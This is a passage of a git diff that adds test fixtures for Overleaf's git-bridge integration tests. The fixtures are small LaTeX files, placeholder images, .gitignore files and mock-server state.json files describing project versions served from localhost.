"http://127.0.0.1:3864/base/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/000000000000000000000000/main.tex new file mode 100644 index 0000000..933682f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/000000000000000000000000/main.tex @@ -0,0 +1,2 @@ +content +added more stuff diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/000000000000000000000000/nest1/nest1.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/000000000000000000000000/nest1/nest1.tex new file mode 100644 index 0000000..487d7bb --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/000000000000000000000000/nest1/nest1.tex @@ -0,0 +1 @@ +nest1 \ No newline at end of file diff --git 
a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/000000000000000000000000/nest1/nest2/nest2.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/000000000000000000000000/nest1/nest2/nest2.tex
new file mode 100644
index 0000000..e333378
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/000000000000000000000000/nest1/nest2/nest2.tex
@@ -0,0 +1 @@
+nest2
\ No newline at end of file
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/000000000000000000000000/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/000000000000000000000000/overleaf-white-410.png
new file mode 100644
index 0000000..6a23d10
Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/000000000000000000000000/overleaf-white-410.png differ
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/000000000000000000000000/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/000000000000000000000000/test.tex
new file mode 100644
index 0000000..046794f
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/000000000000000000000000/test.tex
@@ -0,0 +1 @@
+This text is from another file.
\ No newline at end of file
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/state.json
new file mode 100644
index 0000000..5bdb082
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedNestedFile/withModifiedNestedFile/state.json
@@ -0,0 +1,80 @@
+[
+    {
+        "project": "000000000000000000000000",
+        "getDoc": {
+            "versionID": 2,
+            "createdAt": "2014-11-30T18:40:58.123Z",
+            "email": "jdleesmiller+1@gmail.com",
+            "name": "John+1"
+        },
+        "getSavedVers": [
+            {
+                "versionID": 2,
+                "comment": "i added nested stuff",
+                "email": "jdleesmiller+1@gmail.com",
+                "name": "John+1",
+                "createdAt": "2014-11-30T18:48:01.123Z"
+            },
+            {
+                "versionID": 1,
+                "comment": "added more info on doc GET and error details",
+                "email": "jdleesmiller+1@gmail.com",
+                "name": "John+1",
+                "createdAt": "2014-11-30T18:47:01.456Z"
+            }
+        ],
+        "getForVers": [
+            {
+                "versionID": 2,
+                "srcs": [
+                    {
+                        "content": "content\nadded more stuff\n",
+                        "path": "main.tex"
+                    },
+                    {
+                        "content": "This text is from another file.",
+                        "path": "test.tex"
+                    },
+                    {
+                        "content": "nest1",
+                        "path": "nest1/nest1.tex"
+                    },
+                    {
+                        "content": "nest2",
+                        "path": "nest1/nest2/nest2.tex"
+                    }
+                ],
+                "atts": [
+                    {
+                        "url": "http://127.0.0.1:3864/withModifiedNestedFile/000000000000000000000000/overleaf-white-410.png",
+                        "path": "overleaf-white-410.png"
+                    }
+                ]
+            },
+            {
+                "versionID": 1,
+                "srcs": [
+                    {
+                        "content": "content\n",
+                        "path": "main.tex"
+                    },
+                    {
+                        "content": "This text is from another file.",
+                        "path": "test.tex"
+                    }
+                ],
+                "atts": [
+                    {
+                        "url": "http://127.0.0.1:3864/base/000000000000000000000000/overleaf-white-410.png",
+                        "path": "overleaf-white-410.png"
+                    }
+                ]
+            }
+        ],
+        "push": "success",
+        "postback": {
+            "type": "success",
+            "versionID": 2
+        }
+    }
+]
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/base/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/base/000000000000000000000000/main.tex
new file mode 100644
index 0000000..d95f3ad
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/base/000000000000000000000000/main.tex
@@ -0,0 +1 @@
+content
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/base/000000000000000000000000/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/base/000000000000000000000000/overleaf-white-410.png
new file mode 100644
index 0000000..6a23d10
Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/base/000000000000000000000000/overleaf-white-410.png differ
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/base/000000000000000000000000/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/base/000000000000000000000000/test.tex
new file mode 100644
index 0000000..046794f
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/base/000000000000000000000000/test.tex
@@ -0,0 +1 @@
+This text is from another file.
\ No newline at end of file
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/base/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/base/state.json
new file mode 100644
index 0000000..ffbc946
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/base/state.json
@@ -0,0 +1,46 @@
+[
+    {
+        "project": "000000000000000000000000",
+        "getDoc": {
+            "versionID": 1,
+            "createdAt": "2014-11-30T18:40:58.123Z",
+            "email": "jdleesmiller+1@gmail.com",
+            "name": "John+1"
+        },
+        "getSavedVers": [
+            {
+                "versionID": 1,
+                "comment": "added more info on doc GET and error details",
+                "email": "jdleesmiller+1@gmail.com",
+                "name": "John+1",
+                "createdAt": "2014-11-30T18:47:01.456Z"
+            }
+        ],
+        "getForVers": [
+            {
+                "versionID": 1,
+                "srcs": [
+                    {
+                        "content": "content\n",
+                        "path": "main.tex"
+                    },
+                    {
+                        "content": "This text is from another file.",
+                        "path": "test.tex"
+                    }
+                ],
+                "atts": [
+                    {
+                        "url": "http://127.0.0.1:3859/base/000000000000000000000000/overleaf-white-410.png",
+                        "path": "overleaf-white-410.png"
+                    }
+                ]
+            }
+        ],
+        "push": "success",
+        "postback": {
+            "type": "success",
+            "versionID": 2
+        }
+    }
+]
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/withModifiedTexFile/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/withModifiedTexFile/000000000000000000000000/main.tex
new file mode 100644
index 0000000..933682f
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/withModifiedTexFile/000000000000000000000000/main.tex
@@ -0,0 +1,2 @@
+content
+added more stuff
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/withModifiedTexFile/000000000000000000000000/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/withModifiedTexFile/000000000000000000000000/overleaf-white-410.png
new file mode 100644
index 0000000..6a23d10
Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/withModifiedTexFile/000000000000000000000000/overleaf-white-410.png differ
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/withModifiedTexFile/000000000000000000000000/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/withModifiedTexFile/000000000000000000000000/test.tex
new file mode 100644
index 0000000..1578584
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/withModifiedTexFile/000000000000000000000000/test.tex
@@ -0,0 +1 @@
+This text is from another file. and modified
\ No newline at end of file
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/withModifiedTexFile/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/withModifiedTexFile/state.json
new file mode 100644
index 0000000..afcd359
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullAModifiedTexFile/withModifiedTexFile/state.json
@@ -0,0 +1,72 @@
+[
+    {
+        "project": "000000000000000000000000",
+        "getDoc": {
+            "versionID": 2,
+            "createdAt": "2014-11-30T18:40:58.123Z",
+            "email": "jdleesmiller+1@gmail.com",
+            "name": "John+1"
+        },
+        "getSavedVers": [
+            {
+                "versionID": 2,
+                "comment": "i deleted test.tex",
+                "email": "jdleesmiller+1@gmail.com",
+                "name": "John+1",
+                "createdAt": "2014-11-30T18:48:01.123Z"
+            },
+            {
+                "versionID": 1,
+                "comment": "added more info on doc GET and error details",
+                "email": "jdleesmiller+1@gmail.com",
+                "name": "John+1",
+                "createdAt": "2014-11-30T18:47:01.456Z"
+            }
+        ],
+        "getForVers": [
+            {
+                "versionID": 2,
+                "srcs": [
+                    {
+                        "content": "content\nadded more stuff\n",
+                        "path": "main.tex"
+                    },
+                    {
+                        "content": "This text is from another file. and modified",
+                        "path": "test.tex"
+                    }
+                ],
+                "atts": [
+                    {
+                        "url": "http://127.0.0.1:3859/withModifiedTexFile/000000000000000000000000/overleaf-white-410.png",
+                        "path": "overleaf-white-410.png"
+                    }
+                ]
+            },
+            {
+                "versionID": 1,
+                "srcs": [
+                    {
+                        "content": "content\n",
+                        "path": "main.tex"
+                    },
+                    {
+                        "content": "This text is from another file.",
+                        "path": "test.tex"
+                    }
+                ],
+                "atts": [
+                    {
+                        "url": "http://127.0.0.1:3859/base/000000000000000000000000/overleaf-white-410.png",
+                        "path": "overleaf-white-410.png"
+                    }
+                ]
+            }
+        ],
+        "push": "success",
+        "postback": {
+            "type": "success",
+            "versionID": 2
+        }
+    }
+]
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/000000000000000000000000/main.tex
new file mode 100644
index 0000000..d95f3ad
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/000000000000000000000000/main.tex
@@ -0,0 +1 @@
+content
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/000000000000000000000000/nest1/nest1.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/000000000000000000000000/nest1/nest1.tex
new file mode 100644
index 0000000..487d7bb
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/000000000000000000000000/nest1/nest1.tex
@@ -0,0 +1 @@
+nest1
\ No newline at end of file
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/000000000000000000000000/nest1/nest2/nest2.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/000000000000000000000000/nest1/nest2/nest2.tex
new file mode 100644
index 0000000..e333378
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/000000000000000000000000/nest1/nest2/nest2.tex
@@ -0,0 +1 @@
+nest2
\ No newline at end of file
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/000000000000000000000000/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/000000000000000000000000/overleaf-white-410.png
new file mode 100644
index 0000000..6a23d10
Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/000000000000000000000000/overleaf-white-410.png differ
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/000000000000000000000000/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/000000000000000000000000/test.tex
new file mode 100644
index 0000000..046794f
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/000000000000000000000000/test.tex
@@ -0,0 +1 @@
+This text is from another file.
\ No newline at end of file
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/state.json
new file mode 100644
index 0000000..e4b4e85
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/base/state.json
@@ -0,0 +1,54 @@
+[
+    {
+        "project": "000000000000000000000000",
+        "getDoc": {
+            "versionID": 1,
+            "createdAt": "2014-11-30T18:40:58.123Z",
+            "email": "jdleesmiller+1@gmail.com",
+            "name": "John+1"
+        },
+        "getSavedVers": [
+            {
+                "versionID": 1,
+                "comment": "added more info on doc GET and error details",
+                "email": "jdleesmiller+1@gmail.com",
+                "name": "John+1",
+                "createdAt": "2014-11-30T18:47:01.456Z"
+            }
+        ],
+        "getForVers": [
+            {
+                "versionID": 1,
+                "srcs": [
+                    {
+                        "content": "content\n",
+                        "path": "main.tex"
+                    },
+                    {
+                        "content": "This text is from another file.",
+                        "path": "test.tex"
+                    },
+                    {
+                        "content": "nest1",
+                        "path": "nest1/nest1.tex"
+                    },
+                    {
+                        "content": "nest2",
+                        "path": "nest1/nest2/nest2.tex"
+                    }
+                ],
+                "atts": [
+                    {
+                        "url": "http://127.0.0.1:3865/base/000000000000000000000000/overleaf-white-410.png",
+                        "path": "overleaf-white-410.png"
+                    }
+                ]
+            }
+        ],
+        "push": "success",
+        "postback": {
+            "type": "success",
+            "versionID": 2
+        }
+    }
+]
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/withDeletedNestedFiles/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/withDeletedNestedFiles/000000000000000000000000/main.tex
new file mode 100644
index 0000000..d95f3ad
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/withDeletedNestedFiles/000000000000000000000000/main.tex
@@ -0,0 +1 @@
+content
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/withDeletedNestedFiles/000000000000000000000000/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/withDeletedNestedFiles/000000000000000000000000/overleaf-white-410.png
new file mode 100644
index 0000000..6a23d10
Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/withDeletedNestedFiles/000000000000000000000000/overleaf-white-410.png differ
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/withDeletedNestedFiles/000000000000000000000000/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/withDeletedNestedFiles/000000000000000000000000/test.tex
new file mode 100644
index 0000000..046794f
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/withDeletedNestedFiles/000000000000000000000000/test.tex
@@ -0,0 +1 @@
+This text is from another file.
\ No newline at end of file
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/withDeletedNestedFiles/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/withDeletedNestedFiles/state.json
new file mode 100644
index 0000000..f1c61fd
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullDeletedNestedFiles/withDeletedNestedFiles/state.json
@@ -0,0 +1,80 @@
+[
+    {
+        "project": "000000000000000000000000",
+        "getDoc": {
+            "versionID": 2,
+            "createdAt": "2014-11-30T18:40:58.123Z",
+            "email": "jdleesmiller+1@gmail.com",
+            "name": "John+1"
+        },
+        "getSavedVers": [
+            {
+                "versionID": 2,
+                "comment": "i deleted nested stuff",
+                "email": "jdleesmiller+1@gmail.com",
+                "name": "John+1",
+                "createdAt": "2014-11-30T18:48:01.123Z"
+            },
+            {
+                "versionID": 1,
+                "comment": "added more info on doc GET and error details",
+                "email": "jdleesmiller+1@gmail.com",
+                "name": "John+1",
+                "createdAt": "2014-11-30T18:47:01.456Z"
+            }
+        ],
+        "getForVers": [
+            {
+                "versionID": 2,
+                "srcs": [
+                    {
+                        "content": "content\n",
+                        "path": "main.tex"
+                    },
+                    {
+                        "content": "This text is from another file.",
+                        "path": "test.tex"
+                    }
+                ],
+                "atts": [
+                    {
+                        "url": "http://127.0.0.1:3865/withDeletedNestedFiles/000000000000000000000000/overleaf-white-410.png",
+                        "path": "overleaf-white-410.png"
+                    }
+                ]
+            },
+            {
+                "versionID": 1,
+                "srcs": [
+                    {
+                        "content": "content\n",
+                        "path": "main.tex"
+                    },
+                    {
+                        "content": "This text is from another file.",
+                        "path": "test.tex"
+                    },
+                    {
+                        "content": "nest1",
+                        "path": "nest1/nest1.tex"
+                    },
+                    {
+                        "content": "nest2",
+                        "path": "nest1/nest2/nest2.tex"
+                    }
+                ],
+                "atts": [
+                    {
+                        "url": "http://127.0.0.1:3865/base/000000000000000000000000/overleaf-white-410.png",
+                        "path": "overleaf-white-410.png"
+                    }
+                ]
+            }
+        ],
+        "push": "success",
+        "postback": {
+            "type": "success",
+            "versionID": 2
+        }
+    }
+]
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/base/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/base/000000000000000000000000/main.tex
new file mode 100644
index 0000000..d95f3ad
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/base/000000000000000000000000/main.tex
@@ -0,0 +1 @@
+content
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/base/000000000000000000000000/sub/.gitignore b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/base/000000000000000000000000/sub/.gitignore
new file mode 100644
index 0000000..2211df6
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/base/000000000000000000000000/sub/.gitignore
@@ -0,0 +1 @@
+*.txt
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/base/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/base/state.json
new file mode 100644
index 0000000..34de094
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/base/state.json
@@ -0,0 +1,41 @@
+[
+    {
+        "project": "000000000000000000000000",
+        "getDoc": {
+            "versionID": 1,
+            "createdAt": "2014-11-30T18:40:58.123Z",
+            "email": "jdleesmiller+1@gmail.com",
+            "name": "John+1"
+        },
+        "getSavedVers": [
+            {
+                "versionID": 1,
+                "comment": "init",
+                "email": "jdleesmiller+1@gmail.com",
+                "name": "John+1",
+                "createdAt": "2014-11-30T18:47:01.456Z"
+            }
+        ],
+        "getForVers": [
+            {
+                "versionID": 1,
+                "srcs": [
+                    {
+                        "content": "content\n",
+                        "path": "main.tex"
+                    },
+                    {
+                        "content": "*.txt",
+                        "path": "sub/.gitignore"
+                    }
+                ],
+                "atts": []
+            }
+        ],
+        "push": "success",
+        "postback": {
+            "type": "success",
+            "versionID": 2
+        }
+    }
+]
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/withUpdatedMainFile/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/withUpdatedMainFile/000000000000000000000000/main.tex
new file mode 100644
index 0000000..3aa9d51
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/withUpdatedMainFile/000000000000000000000000/main.tex
@@ -0,0 +1,2 @@
+content
+updated
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/withUpdatedMainFile/000000000000000000000000/sub/.gitignore b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/withUpdatedMainFile/000000000000000000000000/sub/.gitignore
new file mode 100644
index 0000000..2211df6
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/withUpdatedMainFile/000000000000000000000000/sub/.gitignore
@@ -0,0 +1 @@
+*.txt
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/withUpdatedMainFile/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/withUpdatedMainFile/state.json
new file mode 100644
index 0000000..7e7b5d9
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullIgnoredForceAddedFile/withUpdatedMainFile/state.json
@@ -0,0 +1,45 @@
+[
+    {
+        "project": "000000000000000000000000",
+        "getDoc": {
+            "versionID": 5,
+            "createdAt": "2014-11-30T18:40:58.123Z",
+            "email": "jdleesmiller+1@gmail.com",
+            "name": "John+1"
+        },
+        "getSavedVers": [
+            {
+                "versionID": 5,
+                "comment": "init",
+                "email": "jdleesmiller+1@gmail.com",
+                "name": "John+1",
+                "createdAt": "2014-11-30T18:47:01.456Z"
+            }
+        ],
+        "getForVers": [
+            {
+                "versionID": 5,
+                "srcs": [
+                    {
+                        "content": "content\nupdated\n",
+                        "path": "main.tex"
+                    },
+                    {
+                        "content": "*.txt",
+                        "path": "sub/.gitignore"
+                    },
+                    {
+                        "content": "1",
+                        "path": "sub/one.txt"
+                    }
+                ],
+                "atts": []
+            }
+        ],
+        "push": "success",
+        "postback": {
+            "type": "success",
+            "versionID": 5
+        }
+    }
+]
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/base/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/base/000000000000000000000000/main.tex
new file mode 100644
index 0000000..d95f3ad
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/base/000000000000000000000000/main.tex
@@ -0,0 +1 @@
+content
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/base/000000000000000000000000/overleaf-white-410-copy.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/base/000000000000000000000000/overleaf-white-410-copy.png
new file mode 100644
index 0000000..6a23d10
Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/base/000000000000000000000000/overleaf-white-410-copy.png differ
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/base/000000000000000000000000/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/base/000000000000000000000000/overleaf-white-410.png
new file mode 100644
index 0000000..6a23d10
Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/base/000000000000000000000000/overleaf-white-410.png differ
diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/base/000000000000000000000000/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/base/000000000000000000000000/test.tex
new file mode 100644
index 0000000..046794f
--- /dev/null
+++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/base/000000000000000000000000/test.tex
@@ -0,0 +1 @@
+This text is from another file.
\ No newline at end of file
